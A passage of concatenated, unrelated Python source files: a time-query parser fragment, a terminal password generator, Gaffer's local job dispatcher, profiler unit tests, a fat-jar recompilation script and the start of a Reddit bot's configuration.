"""query : timeref """
t[0] = t[1]
# an absolute time reference. can be a unix timestamp, a date string,
# or "now"
def p_timeref(t):
"""timeref : abstime
| abstime reltime"""
t[0] = t[1]
if len(t) == 2:
ref = t[1]
else:
ref = t[1] + t[2]
t[0] = ref
def p_abstime(t):
"""abstime : NUMBER
| QSTRING
| NOW"""
if t[1] == 'now':
t[0] = now()
elif type(t[1]) == type(''):
t[0] = parse_time(t[1])
else:
t[0] = datetime.utcfromtimestamp(t[1] / 1000)
def p_reltime(t):
"""reltime : NUMBER LVALUE
| NUMBER LVALUE reltime"""
timeunit = get_timeunit(t[2])
delta = timedelta(**{timeunit: t[1]})
if len(t) == 3:
t[0] = delta
else:
t[0] = t[3] + delta
# Error rule for syntax errors
def p_error(p):
raise ValueError("Syntax Error in Query")
|
app.py
|
from threading import Thread
import time
import npyscreen
import pyperclip
from restpass import PAYLOAD
from restpass.generator import Generator
MAX_CHARS = 30
def copy_button(parent_app):
class CopyButton(npyscreen.ButtonPress):
def __init__(self, *args, **keywords):
super().__init__(*args, **keywords)
def whenPressed(self):
if parent_app.output_raw:
pyperclip.copy(parent_app.output_raw)
parent_app.output_raw = ""
parent_app.reset_widgets()
return CopyButton
def paste_button(destination):
class PasteButton(npyscreen.ButtonPress):
def __init__(self, *args, **keywords):
super().__init__(*args, **keywords)
def whenPressed(self):
destination.set_value(pyperclip.paste())
return PasteButton
class RestpassApp(npyscreen.NPSAppManaged):
def __init__(self):
super().__init__()
def init_widgets(self):
self.form = npyscreen.Form(name=f"{PAYLOAD['name']}-v{PAYLOAD['version']}")
self.hide_output_checkbox = self.form.add(npyscreen.Checkbox, name="Hide output", value=False)
self.show_length_slider = self.form.add(npyscreen.TitleSlider, out_of=MAX_CHARS, name="Show length:")
self.separator()
self.length_slider = self.form.add(npyscreen.TitleSlider, value=8, lowest=3, out_of=MAX_CHARS, name="Length:")
self.input_entry = self.form.add(npyscreen.TitlePassword, name="Input:")
self.input_paste_button = self.form.add(paste_button(destination=self.input_entry), name="Paste")
self.salt_entry = self.form.add(npyscreen.TitlePassword, name="Salt:")
self.salt_paste_button = self.form.add(paste_button(destination=self.salt_entry), name="Paste")
self.alphabet_select = self.form.add(npyscreen.TitleMultiSelect, max_height=4, value=[0, 1, 2], name="Alphabet:", values=["Digits", "Lowercase", "Uppercase", "Symbols"], scroll_exit=True)
self.separator()
self.output_title = self.form.add(npyscreen.TitleFixedText, name="Output:")
self.copy_button = self.form.add(copy_button(parent_app=self), name="Copy")
def reset_widgets(self):
self.input_entry.set_value("")
self.salt_entry.set_value("")
self.length_slider.set_value(3)
self.alphabet_select.set_value([0, 1, 2])
def separator(self):
self.form.add(npyscreen.FixedText, value="––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––")
def main(self):
self.init_widgets()
thread = Thread(target=self.update, name="UPDATE")
thread.daemon = True
thread.start()
try:
self.form.edit()
# thread.join()
except KeyboardInterrupt:
pass
def update(self, delay=0.01):
while True:
source = self.input_entry.get_value()
alphabet = self.alphabet_select.get_selected_objects()
if source and alphabet:
generator = Generator(source=source)
if self.salt_entry.get_value():
generator.set_salt(self.salt_entry.get_value().encode("utf-8"))
generator.set_rules(digits="Digits" in alphabet,
lowercase="Lowercase" in alphabet,
uppercase="Uppercase" in alphabet,
symbols="Symbols" in alphabet)
self.output_raw = generator.generate(length=int(self.length_slider.get_value()))
if self.hide_output_checkbox.value:
show_length = int(self.show_length_slider.get_value())
output_str = self.output_raw[:show_length] + "*" * (len(self.output_raw) - show_length)
else:
output_str = self.output_raw
self.output_title.set_value(output_str)
else:
self.output_title.set_value("")
self.form.display()
time.sleep(delay)
|
LocalDispatcher.py
|
##########################################################################
#
# Copyright (c) 2013-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import errno
import signal
import shlex
import subprocess32 as subprocess
import threading
import time
import traceback
import IECore
import Gaffer
import GafferDispatch
class LocalDispatcher( GafferDispatch.Dispatcher ) :
def __init__( self, name = "LocalDispatcher", jobPool = None ) :
GafferDispatch.Dispatcher.__init__( self, name )
self["executeInBackground"] = Gaffer.BoolPlug( defaultValue = False )
self["ignoreScriptLoadErrors"] = Gaffer.BoolPlug( defaultValue = False )
self["environmentCommand"] = Gaffer.StringPlug()
self.__jobPool = jobPool if jobPool else LocalDispatcher.defaultJobPool()
class Job( object ) :
Status = IECore.Enum.create( "Waiting", "Running", "Complete", "Failed", "Killed" )
def __init__( self, batch, dispatcher, name, jobId, directory ) :
assert( isinstance( batch, GafferDispatch.Dispatcher._TaskBatch ) )
assert( isinstance( dispatcher, GafferDispatch.Dispatcher ) )
self.__batch = batch
## \todo Stop storing this. It's just a temptation to access potentially
# invalid data during background dispatches - all dispatcher settings _must_
# be copied to the job upon construction, because nothing stops a user changing
# the dispatcher settings during a background dispatch. Currently __dispatcher
# is used to access the JobPool in __reportCompleted etc - instead the job should
# use signals to report changes in status, and the JobPool should connect to those
# signals. Jobs should be blissfully ignorant of JobPools.
self.__dispatcher = dispatcher
script = batch.preTasks()[0].plug().ancestor( Gaffer.ScriptNode )
self.__context = Gaffer.Context( script.context() )
self.__name = name
self.__id = jobId
self.__directory = directory
self.__stats = {}
self.__ignoreScriptLoadErrors = dispatcher["ignoreScriptLoadErrors"].getValue()
## \todo Make `Dispatcher::dispatch()` use a Process, so we don't need to
# do substitutions manually like this.
self.__environmentCommand = Gaffer.Context.current().substitute(
dispatcher["environmentCommand"].getValue()
)
self.__messageHandler = IECore.CapturingMessageHandler()
self.__messageTitle = "%s : Job %s %s" % ( self.__dispatcher.getName(), self.__name, self.__id )
scriptFileName = script["fileName"].getValue()
self.__scriptFile = os.path.join( self.__directory, os.path.basename( scriptFileName ) if scriptFileName else "untitled.gfr" )
script.serialiseToFile( self.__scriptFile )
self.__storeNodeNames( script, batch )
self.__setStatus( batch, LocalDispatcher.Job.Status.Waiting, recursive = True )
def name( self ) :
return self.__name
def id( self ) :
return self.__id
def directory( self ) :
return self.__directory
def description( self ) :
batch = self.__currentBatch( self.__batch )
if batch is None or batch.plug() is None :
return "N/A"
frames = str( IECore.frameListFromList( [ int(x) for x in batch.frames() ] ) )
return "Executing " + batch.blindData()["nodeName"].value + " on frames " + frames
def statistics( self ) :
batch = self.__currentBatch( self.__batch )
if batch is None or "pid" not in batch.blindData().keys() :
return {}
rss = 0
pcpu = 0.0
pid = batch.blindData().get( "pid" )
try :
stats = subprocess.Popen( ( "ps -Ao pid,ppid,pgid,sess,pcpu,rss" ).split( " " ), stdout=subprocess.PIPE, stderr=subprocess.PIPE ).communicate()[0].split()
for i in range( 0, len(stats), 6 ) :
if str(pid) in stats[i:i+4] :
pcpu += float(stats[i+4])
rss += float(stats[i+5])
except :
return {}
return {
"pid" : pid,
"pcpu" : pcpu,
"rss" : rss,
}
def messageHandler( self ) :
return self.__messageHandler
def execute( self, background = False ) :
if background :
threading.Thread( target = self.__backgroundDispatch ).start()
else :
with self.__messageHandler :
self.__foregroundDispatch( self.__batch )
self.__reportCompleted( self.__batch )
def failed( self ) :
return self.__getStatus( self.__batch ) == LocalDispatcher.Job.Status.Failed
def kill( self ) :
if not self.failed() :
self.__kill( self.__batch )
def killed( self ) :
return "killed" in self.__batch.blindData().keys()
def _fail( self ) :
self.__setStatus( self.__batch, LocalDispatcher.Job.Status.Failed )
def __kill( self, batch ) :
# this doesn't set the status to Killed because that could
# run into a race condition with a background dispatch.
batch.blindData()["killed"] = IECore.BoolData( True )
for upstreamBatch in batch.preTasks() :
self.__kill( upstreamBatch )
def __foregroundDispatch( self, batch ) :
for upstreamBatch in batch.preTasks() :
if not self.__foregroundDispatch( upstreamBatch ) :
return False
if batch.blindData().get( "killed" ) :
self.__reportKilled( batch )
return False
if not batch.plug() or self.__getStatus( batch ) == LocalDispatcher.Job.Status.Complete :
self.__setStatus( batch, LocalDispatcher.Job.Status.Complete )
return True
description = "executing %s on %s" % ( batch.blindData()["nodeName"].value, str(batch.frames()) )
IECore.msg( IECore.MessageHandler.Level.Info, self.__messageTitle, description )
try :
self.__setStatus( batch, LocalDispatcher.Job.Status.Running )
batch.execute()
except :
traceback.print_exc()
self.__reportFailed( batch )
return False
self.__setStatus( batch, LocalDispatcher.Job.Status.Complete )
return True
def __backgroundDispatch( self ) :
with self.__messageHandler :
self.__doBackgroundDispatch( self.__batch )
def __doBackgroundDispatch( self, batch ) :
if self.__getStatus( batch ) == LocalDispatcher.Job.Status.Complete :
return True
for upstreamBatch in batch.preTasks() :
if not self.__doBackgroundDispatch( upstreamBatch ) :
return False
if batch.blindData().get( "killed" ) :
self.__reportKilled( batch )
return False
if not batch.plug() :
self.__reportCompleted( batch )
return True
if len( batch.frames() ) == 0 :
# This case occurs for nodes like TaskList and TaskContextProcessors,
# because they don't do anything in execute (they have empty hashes).
# Their batches exist only to depend on upstream batches. We don't need
# to do any work here, but we still signal completion for the task to
# provide progress feedback to the user.
self.__setStatus( batch, LocalDispatcher.Job.Status.Complete )
IECore.msg( IECore.MessageHandler.Level.Info, self.__messageTitle, "Finished " + batch.blindData()["nodeName"].value )
return True
taskContext = batch.context()
frames = str( IECore.frameListFromList( [ int(x) for x in batch.frames() ] ) )
args = [
"gaffer", "execute",
"-script", self.__scriptFile,
"-nodes", batch.blindData()["nodeName"].value,
"-frames", frames,
]
args = shlex.split( self.__environmentCommand ) + args
if self.__ignoreScriptLoadErrors :
args.append( "-ignoreScriptLoadErrors" )
contextArgs = []
for entry in [ k for k in taskContext.keys() if k != "frame" and not k.startswith( "ui:" ) ] :
if entry not in self.__context.keys() or taskContext[entry] != self.__context[entry] :
contextArgs.extend( [ "-" + entry, repr(taskContext[entry]) ] )
if contextArgs :
args.extend( [ "-context" ] + contextArgs )
self.__setStatus( batch, LocalDispatcher.Job.Status.Running )
IECore.msg( IECore.MessageHandler.Level.Info, self.__messageTitle, " ".join( args ) )
process = subprocess.Popen( args, start_new_session=True )
batch.blindData()["pid"] = IECore.IntData( process.pid )
while process.poll() is None :
if batch.blindData().get( "killed" ) :
os.killpg( process.pid, signal.SIGTERM )
self.__reportKilled( batch )
return False
time.sleep( 0.01 )
if process.returncode :
self.__reportFailed( batch )
return False
self.__setStatus( batch, LocalDispatcher.Job.Status.Complete )
return True
def __getStatus( self, batch ) :
return LocalDispatcher.Job.Status( batch.blindData().get( "status", IECore.IntData( int(LocalDispatcher.Job.Status.Waiting) ) ).value )
def __setStatus( self, batch, status, recursive = False ) :
batch.blindData()["status"] = IECore.IntData( int(status) )
if recursive :
for upstreamBatch in batch.preTasks() :
self.__setStatus( upstreamBatch, status, recursive = True )
def __reportCompleted( self, batch ) :
self.__setStatus( batch, LocalDispatcher.Job.Status.Complete )
self.__dispatcher.jobPool()._remove( self )
IECore.msg( IECore.MessageHandler.Level.Info, self.__messageTitle, "Dispatched all tasks for " + self.name() )
def __reportFailed( self, batch ) :
self.__setStatus( batch, LocalDispatcher.Job.Status.Failed )
self.__dispatcher.jobPool()._fail( self )
frames = str( IECore.frameListFromList( [ int(x) for x in batch.frames() ] ) )
IECore.msg( IECore.MessageHandler.Level.Error, self.__messageTitle, "Failed to execute " + batch.blindData()["nodeName"].value + " on frames " + frames )
def __reportKilled( self, batch ) :
self.__setStatus( batch, LocalDispatcher.Job.Status.Killed )
self.__dispatcher.jobPool()._remove( self )
IECore.msg( IECore.MessageHandler.Level.Info, self.__messageTitle, "Killed " + self.name() )
def __currentBatch( self, batch ) :
if self.__getStatus( batch ) == LocalDispatcher.Job.Status.Running :
return batch
for upstreamBatch in batch.preTasks() :
batch = self.__currentBatch( upstreamBatch )
if batch is not None :
return batch
return None
def __storeNodeNames( self, script, batch ) :
if batch.plug() :
batch.blindData()["nodeName"] = batch.plug().node().relativeName( script )
for upstreamBatch in batch.preTasks() :
self.__storeNodeNames( script, upstreamBatch )
class JobPool( IECore.RunTimeTyped ) :
def __init__( self ) :
self.__jobs = []
self.__failedJobs = []
self.__jobAddedSignal = Gaffer.Signal1()
self.__jobRemovedSignal = Gaffer.Signal1()
self.__jobFailedSignal = Gaffer.Signal1()
def jobs( self ) :
return list(self.__jobs)
def failedJobs( self ) :
return list(self.__failedJobs)
def waitForAll( self ) :
while len(self.__jobs) :
time.sleep( 0.2 )
def jobAddedSignal( self ) :
return self.__jobAddedSignal
def jobRemovedSignal( self ) :
return self.__jobRemovedSignal
def jobFailedSignal( self ) :
return self.__jobFailedSignal
def _append( self, job ) :
assert( isinstance( job, LocalDispatcher.Job ) )
self.__jobs.append( job )
self.jobAddedSignal()( job )
def _remove( self, job, force = False ) :
if job in self.__jobs :
self.__jobs.remove( job )
self.jobRemovedSignal()( job )
if force and job in self.__failedJobs :
self.__failedJobs.remove( job )
def _fail( self, job ) :
if job in self.__jobs and job not in self.__failedJobs :
job._fail()
self.__failedJobs.append( job )
self.jobFailedSignal()( job )
self._remove( job )
__jobPool = JobPool()
@staticmethod
def defaultJobPool() :
return LocalDispatcher.__jobPool
def jobPool( self ) :
return self.__jobPool
def _doDispatch( self, batch ) :
job = LocalDispatcher.Job(
batch = batch,
dispatcher = self,
name = Gaffer.Context.current().substitute( self["jobName"].getValue() ),
jobId = os.path.basename( self.jobDirectory() ),
directory = self.jobDirectory(),
)
self.__jobPool._append( job )
job.execute( background = self["executeInBackground"].getValue() )
IECore.registerRunTimeTyped( LocalDispatcher, typeName = "GafferDispatch::LocalDispatcher" )
IECore.registerRunTimeTyped( LocalDispatcher.JobPool, typeName = "GafferDispatch::LocalDispatcher::JobPool" )
GafferDispatch.Dispatcher.registerDispatcher( "Local", LocalDispatcher )
|
test_mtprof.py
|
import gc
import io
import logging
import os
import pstats
import sys
import subprocess
import threading
import tempfile
import time
import timeit
import unittest
import mtprof
def consume_cpu_simple(delay):
deadline = time.monotonic() + delay
while time.monotonic() < deadline:
pass
def run_until(deadline):
while time.monotonic() < deadline:
pass
def consume_cpu(duration, ncalls):
now = time.monotonic()
for i in range(ncalls):
deadline = now + duration * (i + 1) / ncalls
run_until(deadline)
def f(duration, ncalls):
consume_cpu(duration, ncalls)
def g(duration, ncalls):
consume_cpu(duration, ncalls)
def h(duration, ncalls):
consume_cpu(duration, ncalls)
class TestInternals(unittest.TestCase):
"""
Test internal functions
"""
def test_default_timer(self):
DELAY = 1.4
TOL = 0.2
f = mtprof._default_timer()
t1 = f()
consume_cpu_simple(DELAY)
dt = f() - t1
self.assertGreaterEqual(dt, DELAY - TOL)
self.assertLessEqual(dt, DELAY + TOL)
t = threading.Thread(target=consume_cpu_simple, args=(DELAY,))
t1 = f()
t.start()
t.join()
dt = f() - t1
self.assertLess(dt, 0 + TOL)
class BaseProfilingTest:
def get_function_key(self, func):
try:
code = func.__code__
except AttributeError:
return "", 0, func.__name__
else:
return code.co_filename, code.co_firstlineno, code.co_name
def get_function_repr(self, func, strip_dirs=False):
try:
code = func.__code__
except AttributeError:
raise
else:
# filename:lineno(function)
filename = code.co_filename
if strip_dirs:
filename = os.path.basename(filename)
return "%s:%d(%s)" % (filename, code.co_firstlineno, code.co_name)
def check_function(self, stats, func):
key = self.get_function_key(func)
self.assertIn(key, stats, sorted(stats))
return stats[key]
def check_function_durations(self, stats, func, ncalls, duration):
st = self.check_function(stats, func)
cc, nc, tt, ct, callers = st
self.assertEqual(nc, ncalls)
self.assertLessEqual(ct, duration * 1.5)
self.assertGreaterEqual(ct, duration * 0.8)
return st
def check_in_pstats_output(self, lines, func, ncalls, strip_dirs=True):
"""
Given *lines* output by pstats, check that *func* is mentioned
with *ncalls* total function calls.
"""
look_for = self.get_function_repr(func, strip_dirs)
for line in lines:
parts = line.strip().split()
if parts and parts[-1] == look_for:
break
else:
self.fail("could not find %r in %r" % (look_for, lines))
nc, tt, percall, ct, cumpercall = parts[:5]
nc = int(nc.partition('/')[0])
tt = float(tt)
ct = float(ct)
self.assertEqual(nc, ncalls)
return tt, ct
def check_in_pstats(self, pstats_arg, func, ncalls):
sio = io.StringIO()
st = pstats.Stats(pstats_arg, stream=sio)
st.sort_stats('cumtime').print_stats(20)
return self.check_in_pstats_output(sio.getvalue().splitlines(),
func, ncalls,
strip_dirs=False)
class TestSingleThread(BaseProfilingTest, unittest.TestCase):
"""
Single-thread tests of the Python API.
"""
DURATION = 0.2
NCALLS = 4
def profiler(self):
prof = mtprof.Profile()
self.addCleanup(prof.close)
return prof
def check_stats(self, stats, nruns=1):
self.check_function_durations(stats, f, nruns, self.DURATION)
st = self.check_function_durations(stats, run_until,
self.NCALLS * nruns, self.DURATION)
cc, nc, tt, ct, callers = st
key = self.get_function_key(consume_cpu)
self.assertEqual(list(callers), [key])
def test_enable_disable(self):
prof = self.profiler()
prof.enable()
f(self.DURATION, self.NCALLS)
prof.disable()
prof.create_stats()
self.check_stats(prof.stats)
def test_enable_disable_twice(self):
prof = self.profiler()
prof.enable()
f(self.DURATION / 2, self.NCALLS)
prof.disable()
prof.enable()
f(self.DURATION / 2, self.NCALLS)
prof.disable()
prof.create_stats()
self.check_stats(prof.stats, 2)
def test_runcall(self):
prof = self.profiler()
prof.runcall(f, self.DURATION, ncalls=self.NCALLS)
prof.create_stats()
self.check_stats(prof.stats)
def test_run(self):
import __main__
__main__.some_global_name = f
prof = self.profiler()
prof.run("some_global_name(%r, %r)" % (self.DURATION, self.NCALLS))
prof.create_stats()
self.check_stats(prof.stats)
def test_runctx(self):
prof = self.profiler()
prof.runctx("f(duration, ncalls)",
dict(f=f),
dict(duration=self.DURATION, ncalls=self.NCALLS))
prof.create_stats()
self.check_stats(prof.stats)
def test_pstats(self):
prof = self.profiler()
prof.runcall(f, self.DURATION, ncalls=self.NCALLS)
tt, ct = self.check_in_pstats(prof, run_until, ncalls=self.NCALLS)
self.assertLessEqual(ct, self.DURATION * 1.5)
self.assertGreaterEqual(ct, self.DURATION * 0.8)
def test_finalizer(self):
prof = mtprof.Profile()
prof.close()
prof = mtprof.Profile()
del prof
gc.collect()
prof = mtprof.Profile()
prof.close()
class TestMultiThread(BaseProfilingTest, unittest.TestCase):
"""
Multi-thread tests of the Python API.
"""
DURATIONS = {f: 0.4,
g: 0.1,
h: 0.8}
NCALLS = 4
def profiler(self):
prof = mtprof.Profile()
self.addCleanup(prof.close)
return prof
def check_nominal_stats(self, stats):
func_durations = {}
for func in (f, g, h):
cc, nc, tt, ct, callers = self.check_function(stats, f)
self.assertEqual(nc, 1)
func_durations[func] = ct
# Since we're measuring per-thread CPU time and there's the GIL,
# each function's measurement is an unstable fraction of its wall
# clock time duration.
# Therefore only check 1) relative order 2) total summed duration
self.assertLessEqual(func_durations[g], func_durations[f])
self.assertLessEqual(func_durations[f], func_durations[h])
expected_duration = max(self.DURATIONS.values())
total_duration = sum(func_durations.values())
self.assertGreaterEqual(total_duration, expected_duration * 0.6)
self.assertLessEqual(total_duration, expected_duration * 1.8)
self.check_function_durations(stats, run_until, self.NCALLS * 3,
expected_duration)
def nominal_workload(self, nruns=1):
threads = [threading.Thread(target=func,
args=(self.DURATIONS[func], self.NCALLS))
for func in (g, h)]
for t in threads:
t.start()
f(self.DURATIONS[f], self.NCALLS)
for t in threads:
t.join()
def test_enable_disable(self):
prof = self.profiler()
prof.enable()
self.nominal_workload()
prof.disable()
prof.create_stats()
self.check_nominal_stats(prof.stats)
# XXX add tests for warnings with unhandled threads
class TestCLI(BaseProfilingTest, unittest.TestCase):
def run_cli(self, args, retcode=0):
command = [sys.executable, '-m', 'mtprof'] + args
proc = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True,
timeout=10)
if proc.returncode != retcode:
print("------- Process stdout --------")
print(proc.stdout)
print("------- Process stderr --------")
print(proc.stderr)
self.assertEqual(proc.returncode, retcode)
return proc
def make_tempfile(self, suffix=None):
fd, name = tempfile.mkstemp(prefix='test_mprof_', suffix=suffix)
os.close(fd)
self.addCleanup(os.unlink, name)
return name
def timeit_args(self):
timeit_args = ['-n', '800', '-r', '2',
'-s', 'import logging', 'logging.getLogger("foo")']
return timeit_args
def timeit_check(self, lines):
self.check_in_pstats_output(lines, logging.getLogger, 1600)
def test_basic(self):
proc = self.run_cli([], retcode=2)
proc = self.run_cli(['-m'], retcode=2)
def test_timeit_module(self):
"""
python -m mtprof -m timeit ...
"""
proc = self.run_cli(['-m', 'timeit'] + self.timeit_args())
self.timeit_check(proc.stdout.splitlines())
self.assertFalse(proc.stderr)
def test_timeit_script(self):
"""
python -m mtprof /xxx/timeit.py ...
"""
proc = self.run_cli([timeit.__file__] + self.timeit_args())
self.timeit_check(proc.stdout.splitlines())
self.assertFalse(proc.stderr)
def test_outfile(self):
outfile = self.make_tempfile(suffix='.prof')
proc = self.run_cli(['-o', outfile, '-m', 'timeit'] + self.timeit_args())
self.assertFalse(proc.stderr)
sio = io.StringIO()
stats = pstats.Stats(outfile, stream=sio)
stats.strip_dirs()
stats.sort_stats('time')
stats.print_stats(30)
self.timeit_check(sio.getvalue().splitlines())
if __name__ == "__main__":
unittest.main()
|
uf.py
|
#!/usr/bin/env python3
"""This script updates individual class files in a language
and diagram server fat jar that has already been created.
"""
# FIXME: Ideally this should be a TypeScript file written in a
# style consistent with build_lds.ts.
import os
import shutil
import argparse
import subprocess
import time
import threading
import tempfile
import shutil
__author__ = "Peter Donovan"
__email__ = "[email protected]"
# This is the path to the fat jar that is to be updated.
FAT_JAR = os.path.join('lib', 'lflang-lds.jar')
LF_REPO_NAME = 'lingua-franca' # FIXME: Duplicates of config.ts
def main(args):
t0 = time.time()
n = 0
count_thread = threading.Thread(target=count)
count_thread.start()
try:
for src_dir_name in ('src', 'xtend-gen'):
directory = get_directory(args.name, src_dir_name)
condition = lambda f: (
os.path.isfile(os.path.join(directory, f))
and compiler(f) is not None
)
if not directory:
class_name_start = args.name.rindex('.')
directory = get_directory(
args.name[:class_name_start],
src_dir_name
)
previous_condition = condition
condition = lambda f: (
previous_condition(f) and (
os.path.splitext(os.path.basename(f))[0]
== args.name[(class_name_start+1):]
)
)
if not directory: continue
files = list(filter(condition, os.listdir(directory)))
update_fat_jar(directory, files)
n += len(files)
if n == 0:
error('The package or file specified could not be found.')
else:
success('{} SOURCE FILE{} UPDATED in {:.0f} seconds.'.format(
n,
('' if n == 1 else 'S'),
time.time() - t0
))
finally:
count_thread.terminate = True
# ~~~~~~~~~~~~~~~ Compilation-related logic ~~~~~~~~~~~~~~~~
def update_fat_jar(directory, files):
"""Updates the language server fat jar with the specified Java and/or
Kotlin files.
:param directory: the directory in which the given files live
:param file: the names of the files to be updated
"""
if not files: return
fat_jar_abs = os.path.join(get_repo_root(), FAT_JAR)
output_dir = os.path.join(tempfile.gettempdir(), 'org.lflang.lds', 'src')
for file in files:
compiler(file)(fat_jar_abs, directory, file, output_dir)
class_files = [
os.path.relpath(artifact, output_dir)
for artifact in files_with_extension(output_dir, '.class')
]
clean_print('Updating fat jar with {}...'.format(', '.join([
os.path.basename(class_file) for class_file in class_files
])))
check_call(
['jar', 'uf', fat_jar_abs, *class_files],
cwd=output_dir
)
# This is not safe from symlink attacks!
shutil.rmtree(output_dir)
def compiler(file):
if file.endswith('.kt'):
return compile_kotlin
if file.endswith('.java'):
return compile_java
def _javac_like_compiler(name):
def compiler(classpath, directory, file, output_dir):
clean_print('Compiling {}...'.format(file))
check_call(
[name, '-cp', classpath, '-d', output_dir, file],
cwd=directory,
shell=(os.name == 'nt') # True iff the OS is Windows.
)
return compiler
def check_call(*args, **kwargs):
command = args[0][0]
if shutil.which(command) is not None:
subprocess.check_call(*args, **kwargs)
else:
error(
"The command {} could not be found. Is {} installed and on your "
"path?".format(command, command)
)
exit(1)
compile_java = _javac_like_compiler('javac')
"""Compiles the Java file `file`.
:param classpath: an absolute path to a jar containing all files
needed by this file
:param directory: the directory in which the Java file lives
:param file: the name of the Java file
"""
compile_kotlin = _javac_like_compiler('kotlinc')
"""Compiles the Kotlin file `file`.
:param classpath: an absolute path to a jar containing all files
needed by this file
:param directory: the directory in which the Kotlin file lives
:param file: the name of the Kotlin file
"""
# ~~~~~~~~~~~~~~~ File system-related logic ~~~~~~~~~~~~~~~~
def files_with_extension(directory, extension):
for dirpath, dirnames, filenames in os.walk(directory):
for filename in filenames:
if os.path.splitext(filename)[1] == extension:
yield os.path.join(dirpath, filename)
def get_directory(package_name, src_dir_name):
"""Returns the directory associated with the module that has the
given canonical name. Returns None if there is no such directory.
:param package_name: the canonical name of the desired package
"""
parts = package_name.split('.')
def get_directory(subproject_len, src_dir_name):
return os.path.join(
get_lf_repo_root(),
'.'.join(parts[:subproject_len]),
src_dir_name, *parts
)
subproject_len = 0
while subproject_len <= len(parts):
subproject_len += 1
path = get_directory(subproject_len, src_dir_name)
if os.path.isdir(path):
return path # The path leads to a package.
def get_repo_root():
"""Returns the absolute path to the root of the repository in which
this script was invoked.
"""
return get_suitable_parent(
lambda path: os.path.isdir(os.path.join(path, '.git'))
)
def get_lf_repo_root():
"""Returns the absolute path to the root of the lingua-franca
repository.
"""
return os.path.join(get_repo_root(), LF_REPO_NAME)
def get_src_directory(path):
"""Returns a path to the parent `src` directory of the specified
path.
"""
return get_suitable_parent(
lambda path: os.path.basename(path) == 'src',
path
)
def get_suitable_parent(condition, path='.'):
assert path != os.pardir, 'Could not find the requested parent directory.'
if condition(path):
return os.path.abspath(path)
return get_suitable_parent(condition, get_parent_dir(path))
def get_parent_dir(path):
"""Returns the parent directory of the file denoted by `path`."""
return os.path.abspath(os.path.join(path, os.pardir))
# ~~~~~~~~~~~~~~~ Printing-related logic ~~~~~~~~~~~~~~~~
def get_clean_print(n_chars_to_overwrite):
def clean_print(message, r=255, g=255, b=255, end='\n'):
difference = n_chars_to_overwrite - len(message + end)
print(colored(r, g, b, message), end='')
if end in ('\r', '\n'):
print(' ' * difference, end=end)
if end == '\r':
return get_clean_print(len(message))
elif end == '\n':
return get_clean_print(0)
else:
return get_clean_print(difference)
return clean_print
class Printer:
def __init__(self):
self._clean_print = get_clean_print(0)
def clean_print(self, message):
self._clean_print = self._clean_print(message)
def progress(self, message):
self._clean_print = self._clean_print(message, 255, 255, 0, end='\r')
def error(self, message):
self._clean_print = self._clean_print('[ERROR]', 255, 0, 0, end=' ')
self._clean_print = self._clean_print(message)
def success(self, message):
self._clean_print = self._clean_print(
'SUCCESS: {}'.format(message), 100, 255, 0
)
def count(self):
t0 = time.time()
while not getattr(threading.current_thread(), 'terminate', False):
self.progress('Elapsed time: {:.0f} seconds'.format(time.time() - t0))
time.sleep(0.1)
_printer = Printer()
clean_print = _printer.clean_print
progress = _printer.progress
error = _printer.error
success = _printer.success
count = _printer.count
def colored(r, g, b, text):
return '\033[38;2;{};{};{}m{} \033[38;2;255;255;255m'.format(r, g, b, text)
# ~~~~~~~~~~~~~~~ Entry point ~~~~~~~~~~~~~~~~
if __name__ == '__main__':
argParser = argparse.ArgumentParser(
description='This script updates individual class files in a '
'language and diagram server fat jar that has '
'already been created.'
)
argParser.add_argument(
'-jar', default='jar',
help='override jar command to adjust java version, e.g. '
'/usr/lib/jvm/java-11-openjdk-amd64/bin/jar'
)
argParser.add_argument(
'name',
help='Class or module to recompile, specified by its canonical name.'
)
main(argParser.parse_args())
|
superclippy.py
|
#/u/GoldenSights
import sys
import traceback
import time
import datetime
import sqlite3
import json
import praw
'''USER CONFIGURATION'''
"""GENERAL"""
APP_ID = ""
APP_SECRET = ""
APP_URI = ""
APP_REFRESH = ""
# https://www.reddit.com/comments/3cm1p8/how_to_make_your_bot_use_oauth2/
USERAGENT = "/r/Excel Clippy Office Assistant all-in-one moderator."
# This is a short description of what the bot does.
# For example "/u/GoldenSights' Newsletter bot"
SUBREDDIT = "Goldtesting"
# This is the sub or list of subs to scan for new posts.
# For a single sub, use "sub1".
# For multiple subreddits, use "sub1+sub2+sub3+..."
PLAY_BOOT_SOUND = True
#Play boot.wav
MAXPOSTS = 100
# How many posts to get from the /new queue at once
WAIT = 30
# The number of seconds between cycles. The bot is completely inactive during
# this time
"""**************"""
"""CLIPPYPOINTS™ """
"""**************"""
POINT_STRING_USR = ["Solution Verified"]
# OP can use this string to award points in his thread.
POINT_STRING_MOD = ["+1 Point"]
# Moderators can use this to give points at any time.
POINT_FLAIR_CSS = "points"
# The CSS class associated with point flair
# Set to "" for none
